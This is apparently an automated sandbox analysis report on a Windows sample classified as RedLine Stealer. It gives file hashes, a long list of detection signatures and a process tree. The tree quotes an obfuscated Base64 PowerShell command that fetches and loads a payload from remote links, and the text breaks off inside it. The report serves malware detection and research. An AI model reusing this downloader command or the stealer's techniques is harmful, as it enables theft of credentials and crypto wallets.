Edit tour
Windows
Analysis Report
sRMytgfRpJ.exe
Overview
General Information
Sample name: | sRMytgfRpJ.exerenamed because original name is a hash value |
Original sample name: | 51c009abf871216f8d9e40cdd785ce6c.exe |
Analysis ID: | 1519351 |
MD5: | 51c009abf871216f8d9e40cdd785ce6c |
SHA1: | 54bb04f21150f5706a3171847d3de9851cafcccf |
SHA256: | 9754bc10564077425803459cc91b0197ad96263e6994e9afc2a5fd0e932615d8 |
Tags: | exeuser-abuse_ch |
Infos: | |
Detection
RedLine
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected RedLine Stealer
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops certificate files (DER)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- sRMytgfRpJ.exe (PID: 7328 cmdline:
"C:\Users\ user\Deskt op\sRMytgf RpJ.exe" MD5: 51C009ABF871216F8D9E40CDD785CE6C) - cmd.exe (PID: 7352 cmdline:
cmd.exe /c fqt.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7364 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 7428 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Loc al\Temp\IX P000.TMP\f qt.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7476 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$codigo = 'WwBO#GU# d##u#FM#ZQ By#HY#aQBj #GU#U#Bv#G k#bgB0#E0# YQBu#GE#Zw Bl#HI#XQ#6 #Do#UwBl#G M#dQBy#Gk# d#B5#F##cg Bv#HQ#bwBj #G8#b##g#D 0#I#Bb#E4# ZQB0#C4#Uw Bl#GM#dQBy #Gk#d#B5#F ##cgBv#HQ# bwBj#G8#b# BU#Hk#c#Bl #F0#Og#6#F Q#b#Bz#DE# Mg#N##o#I# #g#C##I##g #C##I##g#C ##I##g#C## ZgB1#G4#Yw B0#Gk#bwBu #C##R#Bv#H c#bgBs#G8# YQBk#EQ#YQ B0#GE#RgBy #G8#bQBM#G k#bgBr#HM# I#B7#C##c# Bh#HI#YQBt #C##K#Bb#H M#d#By#Gk# bgBn#Fs#XQ Bd#CQ#b#Bp #G4#awBz#C k#I##N##o# I##g#C##I# #g#C##I##g #C##I##g#C ##J#B3#GU# YgBD#Gw#aQ Bl#G4#d##g #D0#I#BO#G U#dw#t#E8# YgBq#GU#Yw B0#C##UwB5 #HM#d#Bl#G 0#LgBO#GU# d##u#Fc#ZQ Bi#EM#b#Bp #GU#bgB0#D s#I##N##o# I##g#C##I# #g#C##I##g #C##I##g#C ##J#Bz#Gg# dQBm#GY#b# Bl#GQ#T#Bp #G4#awBz#C ##PQ#g#Ec# ZQB0#C0#Ug Bh#G4#Z#Bv #G0#I##t#E k#bgBw#HU# d#BP#GI#ag Bl#GM#d##g #CQ#b#Bp#G 4#awBz#C## LQBD#G8#dQ Bu#HQ#I##k #Gw#aQBu#G s#cw#u#Ew# ZQBu#Gc#d# Bo#Ds#I##N ##o#I##g#C ##I##g#C## I##g#C##I# #g#C##ZgBv #HI#ZQBh#G M#a##g#Cg# J#Bs#Gk#bg Br#C##aQBu #C##J#Bz#G g#dQBm#GY# b#Bl#GQ#T# Bp#G4#awBz #Ck#I#B7#C ##d#By#Hk# I#B7#C##cg Bl#HQ#dQBy #G4#I##k#H c#ZQBi#EM# b#Bp#GU#bg B0#C4#R#Bv #Hc#bgBs#G 8#YQBk#EQ# YQB0#GE#K# #k#Gw#aQBu #Gs#KQ#g#H 0#I#Bj#GE# d#Bj#Gg#I# B7#C##YwBv #G4#d#Bp#G 4#dQBl#C## fQ#g#H0#Ow #g##0#Cg#g #C##I##g#C ##I##g#C## I##g#C##I# By#GU#d#B1 #HI#bg#g#C Q#bgB1#Gw# b##g#H0#Ow #g##0#Cg#g #C##I##g#C ##I##g#C## I##g#C##I# #k#Gw#aQBu #Gs#cw#g#D 0#I#B##Cg# JwBo#HQ#d# Bw#HM#Og#v #C8#YgBp#H Q#YgB1#GM# awBl#HQ#Lg Bv#HI#Zw#v #HM#a#Bp#G U#b#Bk#GE# Z#Bh#HM#Lw Bn#HM#Z#Bn #Gg#agBq#C 8#Z#Bv#Hc# bgBs#G8#YQ Bk#HM#LwBp #G0#ZwBf#H Q#ZQBz#HQ# LgBq#H##Zw #/#DE#MQ#4 #DE#MQ#3#D M#NQ#n#Cw# I##n#Gg#d# B0#H##cw#6 #C8#LwBy#G E#dw#u#Gc# aQB0#Gg#dQ Bi#HU#cwBl #HI#YwBv#G 4#d#Bl#G4# d##u#GM#bw Bt#C8#cwBh #G4#d#Bv#G 0#YQBs#G8# LwBh#HU#Z# Bp#HQ#LwBt #GE#aQBu#C 8#aQBt#Gc# XwB0#GU#cw B0#C4#agBw #Gc#Pw#x#D Q#N##0#DE# Nw#y#DM#Jw #p#Ds#DQ#K #C##I##g#C ##I##g#C## I##g#C##I# #g#C##J#Bp #G0#YQBn#G U#QgB5#HQ# ZQBz#C##PQ #g#EQ#bwB3 #G4#b#Bv#G E#Z#BE#GE# d#Bh#EY#cg Bv#G0#T#Bp #G4#awBz#C ##J#Bs#Gk# bgBr#HM#Ow #N##o#I##g #C##I##g#C ##I##g#C## I##g#C##I# Bp#GY#I##o #CQ#aQBt#G E#ZwBl#EI# eQB0#GU#cw #g#C0#bgBl #C##J#Bu#H U#b#Bs#Ck# I#B7#C##J# Bp#G0#YQBn #GU#V#Bl#H g#d##g#D0# I#Bb#FM#eQ Bz#HQ#ZQBt #C4#V#Bl#H g#d##u#EU# bgBj#G8#Z# Bp#G4#ZwBd #Do#OgBV#F Q#Rg#4#C4# RwBl#HQ#Uw B0#HI#aQBu #Gc#K##k#G k#bQBh#Gc# ZQBC#Hk#d# Bl#HM#KQ#7 ##0#Cg#g#C ##I##g#C## I##g#C##I# #g#C##I##g #CQ#cwB0#G E#cgB0#EY# b#Bh#Gc#I# #9#C##Jw#8 #Dw#QgBB#F M#RQ#2#DQ# XwBT#FQ#QQ BS#FQ#Pg#+ #Cc#Ow#g#C Q#ZQBu#GQ# RgBs#GE#Zw #g#D0#I##n #Dw#P#BC#E E#UwBF#DY# N#Bf#EU#Tg BE#D4#Pg#n #Ds#I##k#H M#d#Bh#HI# d#BJ#G4#Z# Bl#Hg#I##9 #C##J#Bp#G 0#YQBn#GU# V#Bl#Hg#d#